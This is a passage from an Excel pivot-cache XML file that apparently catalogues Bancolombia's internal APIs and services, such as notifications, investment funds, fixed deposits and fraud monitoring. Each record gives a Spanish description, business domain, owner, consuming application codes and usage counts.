    <s v="Envio Alertas Y Notificaciones"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite obtener la información para crear la estructura de un mensaje de alertas y notificaciones que deba enviarse a un cliente al momento de realizar una transacción. Estas transacciones se encuentran definidas en la sucursal virtual personas y existen también otro tipo de alertas que son obligatorias así el cliente no las haya configurado.  Este servicio invoca la aplicación de alertas y notificaciones almacenada en el módulo PCC en el iseries."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1170 _x000d__x000a_NU0014001 _x000d__x000a_NU0100001 _x000d__x000a_NU0019001 _x000d__x000a_AW1300001 _x000d__x000a_AW0955 _x000d__x000a_NU0103001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0147001 _x000d__x000a_NU0094001 _x000d__x000a_AW0955001 _x000d__x000a_AW1435001 _x000d__x000a_AW1315001 _x000d__x000a_AW1404002 _x000d__x000a_NU0154001 _x000d__x000a_AW1277001 _x000d__x000a_NU0034001 _x000d__x000a_NU0106001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Envio Correo Electronico"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio de EnvioCorreoElectronico consta de las siguientes funcionalidades:  - Envío correo electrónico con un contenido básico. - Envío correo electrónico con adjunto pdf generado por el banco y puesto en una ruta SFTP para que el proveedor de correo (Masivian) lo adjunte al mensaje. - Envío correo electrónico con adjunto pdf generado por el banco y puesto en una ruta SFTP para que el proveedor de correo (Masivian) lo proteja con contraseña y lo adjunte al mensaje. - Envío correo electrónico con adjunto pdf generado por el proveedor de correo (Masivian) utilizando una plantilla previamente cargada en su sistema. - Envío correo electrónico con adjunto pdf generado y protegido con clave por el proveedor de correo (Masivian) utilizando una plantilla previamente cargada en su sistema. - Envío correo electrónico con adjunto enviado en base64 en el mensaje xml, para que el proveedor de correo (Masivian) lo decodifique y lo adjunte como pdf en el mensaje. - Envío correo electrónico con adjunto enviado en base64 en el mensaje xml, para que el proveedor de correo (Masivian) lo decodifique, lo proteja con clave y lo adjunte como pdf en el mensaje."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Masivia"/>
    <s v="APIC _x000d__x000a_AW1177 _x000d__x000a_AW0937 _x000d__x000a_AW1070 _x000d__x000a_AW1285001 _x000d__x000a_AW1373 _x000d__x000a_AW0407 _x000d__x000a_AW1313 _x000d__x000a_AW1097001 _x000d__x000a_AW1272001 _x000d__x000a_AW0398 _x000d__x000a_AW1206001 _x000d__x000a_AW0360007 _x000d__x000a_AW1170 _x000d__x000a_AW1287001 _x000d__x000a_AW1277001 _x000d__x000a_AW1302001 _x000d__x000a_NU0100001 _x000d__x000a_NU107001 _x000d__x000a_NU0004001 _x000d__x000a_AW1315001 _x000d__x000a_AW1128 _x000d__x000a_NU0090001 _x000d__x000a_AW1281003 _x000d__x000a_BIZ _x000d__x000a_AW0360009 _x000d__x000a_AW1172001 _x000d__x000a_AW1287 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0035001 _x000d__x000a_AW1151001 _x000d__x000a_AW1218001 _x000d__x000a_NU0034001 _x000d__x000a_AW1185001 _x000d__x000a_NU0010001 _x000d__x000a_NU0143001 _x000d__x000a_AW1176 _x000d__x000a_NU0013001 _x000d__x000a_NU0170001 _x000d__x000a_NU0113001 _x000d__x000a_AW0660 _x000d__x000a_NU0102001 _x000d__x000a_NU0046001 _x000d__x000a_AW1299001 _x000d__x000a_AW1281002 _x000d__x000a_NU0137001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Envio Correo Electronico Todo1"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El presente servicio permite realizar el envío de correo electrónico básico (sin adjuntos) a través del proveedor Todo1. Dichos correos corresponden a los generados por Alertas y Notificaciones que se encuentra en Iseries. Dichas alertas son generadas dada la ocurrencia de una transacción o evento en un proceso de un producto, que amerite comunicarse a los clientes._x000a__x000a_Su principal función será recibir la trama plana que entrega Iseries para transformarla y entregar al proveedor la estructura solicitada por el mismo."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AW0407 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Envio Data Liquida Persona"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio tiene como objetivo recibir la data líquida que Kofax obtuvo de la lectura de una imagen de un documento (cédula, pasaporte, cédula de extranjería)."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="_x000a__x000a_KOFAX – Herramienta de captura_AW1108001"/>
    <s v="AW0937 _x000d__x000a_AW1108001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Envio Mensajeria Movil"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite realizar el envío de mensajería móvil. Está enfocado a consumidores que tienen la necesidad de realizar envío de mensajes a partir de la ocurrencia de una transacción o evento en un proceso de un producto, donde deba establecerse comunicación con los clientes."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AW0407 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Envio Metadata Documental"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio tiene como alcance el envio de metadata para el proceso de estudio de crédito de consumo originada en bizagi."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Oracle ECM_UCM - Universal Content Management_AW0494001"/>
    <s v="AW0922 _x000d__x000a_AW1108001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Envio Notificacion Push"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Como mecanismos de envío de Alertas y Notificaciones, se tendrán 3 posibilidades, Correo Electrónico, SMS y Notificaciones Push. Para el envío de Notificaciones Push, es necesario que el usuario previamente se haya enrolado en el sistema mediante la APP Personas y se haya actualizado la base de PCC Alertas y Notificaciones para habilitar el envío por este medio. Con esta habilitación, el sistema de Alertas y Notificaciones en Iseries, podrá hacer uso de este servicio que permitirá enviar la información necesaria al Gestor de Envío para enviar la Notificación Push al teléfono del usuario."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="NU0100001 _x000d__x000a_ISPCC0002"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Envio Sms Inalambria"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio está enfocado a consumidores transaccionales que realizan envío de mensajes a partir de la ocurrencia de una transacción o evento en un proceso de un producto, que amerite comunicarse a los clientes."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="PCC - Programas Comunes Canales_SMS Inalambria_ISPCC0011"/>
    <s v="APIC _x000d__x000a_AW1177 _x000d__x000a_AW0937 _x000d__x000a_AW1285001 _x000d__x000a_AW0856 _x000d__x000a_AW1373 _x000d__x000a_AW0407 _x000d__x000a_AW1313 _x000d__x000a_AW1097001 _x000d__x000a_NU0109001 _x000d__x000a_AW1316001 _x000d__x000a_AW0360007 _x000d__x000a_AW1287001 _x000d__x000a_AW1235002 _x000d__x000a_NU0100001 _x000d__x000a_NU107001 _x000d__x000a_NU0004001 _x000d__x000a_AW1315001 _x000d__x000a_AW1287 _x000d__x000a_AW1286001 _x000d__x000a_AW1128 _x000d__x000a_AW1081001 _x000d__x000a_AW0157 _x000d__x000a_AW0939001 _x000d__x000a_NU0010001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW0955001 _x000d__x000a_AW1185001 _x000d__x000a_AW1313001 _x000d__x000a_AW0214001 _x000d__x000a_AW1151001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Envio Sms Redeban"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite realizar el envío de SMS a través del proveedor Redeban. Dichos mensajes corresponden principalmente a los generados por Alertas y Notificaciones que se encuentra en Iseries. Dichas alertas son generadas dada la ocurrencia de una transacción o evento en un proceso de un producto, que amerite comunicarse a los clientes._x000a__x000a_Su función será recibir la trama plana que entrega Iseries para transformarla y entregar al proveedor la estructura XML para el envío del SMS. Por lo tanto no es reusable para otros proyectos._x000a__x000a_El envío se hace uno a uno._x000a_"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Estudio Credito Consumo"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio habilita el análisis de un determinado cliente con el fin de evaluar cuales productos de crédito de consumo se le pueden otorgar."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <s v="APM_AW1081001"/>
    <s v="AW0937 _x000d__x000a_AW1285001 _x000d__x000a_AW0856 _x000d__x000a_AW1011 _x000d__x000a_APICONNECT _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_AW1299001 _x000d__x000a_AW0955001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-05-04T14:42:15"/>
    <s v="Factoring"/>
    <n v="100"/>
    <s v="Factoring - Obligations"/>
    <n v="100"/>
    <s v="factoring-obligations"/>
    <s v="El Api permite a los consumidores obtener el listado de todas las operaciones u obligaciones de Factoring que tenga un cliente, sean de descuento de facturas o lí­nea triangular y con información detallada de cada obligación"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Factoring"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Factoring"/>
    <s v="Lucas Daniel Betancourt"/>
    <m/>
    <m/>
    <s v="PORTALCOBRANZA_AW1294001 _x000d__x000a_ APP_AW1294001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="30249"/>
    <n v="27627"/>
    <n v="25490"/>
    <n v="26293"/>
    <n v="27255"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-08-10T16:26:53"/>
    <s v="Fiduciary Agreement"/>
    <n v="100"/>
    <s v="Fiduciary Agreement - Information"/>
    <n v="100"/>
    <s v="fiduciary-agreement-information"/>
    <s v="Esta API permitirá a los consumidores consultar la información básica de los acuerdos fiduciarios, las cuentas y terceros de los acuerdos fiduciarios"/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Fiduciary_Pdn _x000d__x000a_ ModuloNegociosFiduciarios_NU0247001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-08-10T17:37:57"/>
    <s v="Fiduciary Payment Order"/>
    <n v="100"/>
    <s v="Fiduciary Payment Order - Information"/>
    <n v="100"/>
    <s v="fiduciary-payment-order-information"/>
    <s v="Permite consultar y validar información de las ordenes de pago, ya que esta permite consultar el listado de pagos, validar si están duplicados o si son extemporaneos"/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="FiduciaryPaymentOrderInformation_NU0325001 _x000d__x000a_ FiduciaryPaymentOrderInformation_NU0325001 _x000d__x000a_ FiduciaryPaymentOrderInformation_NU0325001 _x000d__x000a_ FiduciaryPaymentOrderInformation_NU0325001 _x000d__x000a_ ModuloNegociosFiduciarios_NU0247001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Filter Captcha"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Filtro funcional de captcha, consumiendo los servicios de Google y Huawei"/>
    <s v="Transf_y_Soporte_Distribución_Digital"/>
    <s v="Distribucion Digital"/>
    <s v="Galatea"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="ALM"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-05-20T11:09:59"/>
    <s v="Loans Study Vehicle"/>
    <n v="101"/>
    <s v="Final Study"/>
    <n v="101"/>
    <s v="final-study"/>
    <s v="El proceso de Estudio Final, permite el registro de la información de los datos adicionales del cliente, actividad económica, financieros para realizar la ejecución del estudio finalpara el crédito de véhiculo y obtener una aprobación, un rechazo o alguna alternativa adicional como mejorar la capacidad de pago o proceder a un proceso manual."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="VentasDigitalesSufi_NU0037 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-04-06T02:22:21"/>
    <s v="Loans Study Vehicle"/>
    <n v="105"/>
    <s v="Final Study"/>
    <n v="105"/>
    <s v="final-study"/>
    <s v="El proceso de Estudio Final, permite el registro de la información de los datos adicionales del cliente, actividad económica, financieros para realizar la ejecución del estudio finalpara el crédito de véhiculo y obtener una aprobación, un rechazo o alguna alternativa adicional como mejorar la capacidad de pago o proceder a un proceso manual."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ VentasDigitalesSufiVehiculos_AW1097001 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="21273"/>
    <n v="20936"/>
    <n v="16902"/>
    <n v="17884"/>
    <n v="22457"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-05-11T15:01:20"/>
    <s v="Fixed Deposit Account"/>
    <n v="110"/>
    <s v="Fixed Deposit Account - Balances"/>
    <n v="110"/>
    <s v="fixed-deposit-account-balances"/>
    <s v="La API Fixed Deposit Account  Balances permitirá a los diferentes consumidores poder obtener los diferentes saldos de forma detallada para los tipos de productos TDA: Plazos fijos que se posee en las Filiales del Exterior."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="ConsultaSaldosPlazosFijos/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW0360010 _x000d__x000a_ App inversionesGB_AW1185001"/>
    <n v="672"/>
    <n v="1"/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-06-22T10:46:44"/>
    <s v="Fixed Deposit Account"/>
    <n v="202"/>
    <s v="Fixed Deposit Account - Frequency"/>
    <n v="101"/>
    <s v="fixed-deposit-account-frequency"/>
    <s v="Capacidad que  permite realizar la consulta de las posibles periodicidades en el pago de  intereses de una inversión virtual, segíºn el plazo máximo impuesto por el producto.  "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <s v="ConsultaPeriodicidad/V1.0"/>
    <m/>
    <s v="CGC_NU0014001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ SVPSucursalVirtualPersonas_NU0149001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <n v="1"/>
    <n v="2188"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-06-22T10:46:44"/>
    <s v="Fixed Deposit Account"/>
    <n v="202"/>
    <s v="Fixed Deposit Account - Management"/>
    <n v="121"/>
    <s v="fixed-deposit-account-management"/>
    <s v="Api que permite al cliente realizar la simulación, renovar o desactivar la inversión virtual"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <s v="GestionInversiones/V1.0"/>
    <m/>
    <s v="CGC_NU0014001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ SVPSucursalVirtualPersonas_NU0149001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="146809"/>
    <n v="167648"/>
    <n v="151453"/>
    <n v="166315"/>
    <n v="247824"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-06-22T10:46:44"/>
    <s v="Fixed Deposit Account"/>
    <n v="202"/>
    <s v="Fixed Deposit Account -Accounts"/>
    <n v="122"/>
    <s v="fixed-deposit-account-accounts"/>
    <s v="El API tiene como propósito ofrecer distintas capacidades de consulta relacionadas con los productos de inversión virtual, entre ellos:  - realizar la consultas de tasas de la Inversión Virtual  de acuerdo a las condiciones ingresadas por el cliente.   - Consultar las inversion virtuales que se encuentran activas de un cliente  - Consultar el detalle de una inversion virtual en particular "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <s v="ConsultaInversiones/V1.0"/>
    <m/>
    <s v="CGC_NU0014001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ SVPSucursalVirtualPersonas_NU0149001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="131801"/>
    <n v="139572"/>
    <n v="239616"/>
    <n v="708788"/>
    <n v="727682"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-31T10:40:08"/>
    <s v="Fraud"/>
    <n v="101"/>
    <s v="Fraud - Monitoring"/>
    <n v="101"/>
    <s v="fraud-monitoring"/>
    <s v="El api **Fraud - Monitoring** permite realizar un monitoreo antifraude para las transacciones realizadas por un cliente Bancolombia.   El api cuenta con la Operación **&quot;Transferences/actions/analyze&quot;:**   Dicha operación permite obtener un puntaje de riesgo del cliente al momento de ejecutar una transacción por medio de Bancolombia.   En caso de ser un puntaje negativo, el proceso transaccional realiza sus respectivas.   El api debe ser consumido con todos sus campos debidamente diligenciados, para que pueda realizar su monitoreo exitosamente y devolver el puntaje de riesgo en el campo &quot;**riskScore**&quot;, de lo contrario dará una respuesta indicando que los campos deben ser diligenciados correctamente."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="2935"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-04-26T15:24:26"/>
    <s v="fraud evaluation"/>
    <n v="100"/>
    <s v="Fraud evaluation - Fraud monitoring"/>
    <n v="100"/>
    <s v="fraud-evaluation-fraud-monitoring"/>
    <s v="Este servicio evalíºa el riesgo de una transacción en modo sí­ncrono, aplicando sobre la misma los filtros definidos en el ámbito de monitoreo transaccional, es decir, reglas que validen condiciones de las transacciones, adicional, el score de riesgo que SAS FM (herramienta que responde el score a Thanos) genera de acuerdo al perfil transaccional del cliente. Esta api también permitirá a los canales usar análisis comportamental para identificar riesgos de una transacción del cliente con base en el comportamiento que este tenga en los dispositivos que usa "/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Hair Alexander Morales"/>
    <m/>
    <m/>
    <s v="AW1333002_FraudEvaluation _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <n v="12"/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-26T12:28:17"/>
    <s v="Fund Administration"/>
    <n v="150"/>
    <s v="Fund Administration - Consolidated Balances"/>
    <n v="200"/>
    <s v="fund-administration-consolidated-balances"/>
    <s v="Esta API permite consultar el saldo consolidado de los fondos de inversión colectiva de un cliente."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaFondos/V2.0"/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <m/>
    <n v="11149"/>
    <n v="3530"/>
    <n v="6367"/>
    <n v="27550"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-06-02T22:11:19"/>
    <s v="Fund Administration"/>
    <n v="102"/>
    <s v="Fund Administration - Information"/>
    <n v="102"/>
    <s v="fund-administration-information"/>
    <s v="La API permite consultar la información de un fondo de inversión, ya sea de Valores o Fiduciaria del Grupo Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaFondos/V1.0"/>
    <s v="Framework Servicios Fiduciaria_ISFSF0001"/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="383"/>
    <n v="213"/>
    <n v="1430"/>
    <n v="2558"/>
    <n v="3151"/>
    <x v="3"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-26T00:06:18"/>
    <s v="Fund Administration"/>
    <n v="150"/>
    <s v="Fund Administration - Information"/>
    <n v="200"/>
    <s v="fund-administration-information"/>
    <s v="Permite consultar la información de un fondo de inversión colectiva (Valores o Fiduciaria) del Grupo Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaFondos/V2.0"/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="16"/>
    <n v="157"/>
    <n v="114582"/>
    <n v="567210"/>
    <n v="539779"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-26T12:28:17"/>
    <s v="Fund Administration"/>
    <n v="150"/>
    <s v="Fund Administration - Management"/>
    <n v="111"/>
    <s v="fund-administration-management"/>
    <s v="Esta API permitirá a los consumidores realizar la administración de los Fondos de Inversión Colectiva (Fiduciaria, Valores) Grupo Bancolombia."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="1518"/>
    <n v="1042"/>
    <n v="827"/>
    <n v="1561"/>
    <n v="1116"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-09T00:09:52"/>
    <s v="Fund Administration"/>
    <n v="150"/>
    <s v="Fund Administration - Transactions"/>
    <n v="210"/>
    <s v="fund-administration-transactions"/>
    <s v="La API permite consultar los movimientos detallados de los fondos de inversión del Grupo Bancolombia, ya sea de Valores o Fiduciaria."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaFondos/V2.0"/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="11"/>
    <n v="20"/>
    <n v="11"/>
    <n v="3"/>
    <n v="6"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-26T12:28:17"/>
    <s v="Fund Administration"/>
    <n v="150"/>
    <s v="Fund Administration - Transfers"/>
    <n v="131"/>
    <s v="fund-administration-transfers"/>
    <s v="La API Fund Administration - transfers permitirá a los consumidores realizar operaciones de transferencias de fondos de inversión colectiva."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="TransferenciasFondosDeInversion/V1.0"/>
    <m/>
    <s v="AsesoriaAsistida_AW1208 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_AW1177001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ ALM_AW0955001"/>
    <n v="7338"/>
    <n v="10142"/>
    <n v="5228"/>
    <n v="4926"/>
    <n v="5292"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Generacion PIN"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="La operación que incluye este servicio le permite a un cliente generar el PIN (clave de acceso) el cual le permite autenticarse en el uso de los diferentes canales electrónicos del Banco."/>
    <m/>
    <m/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
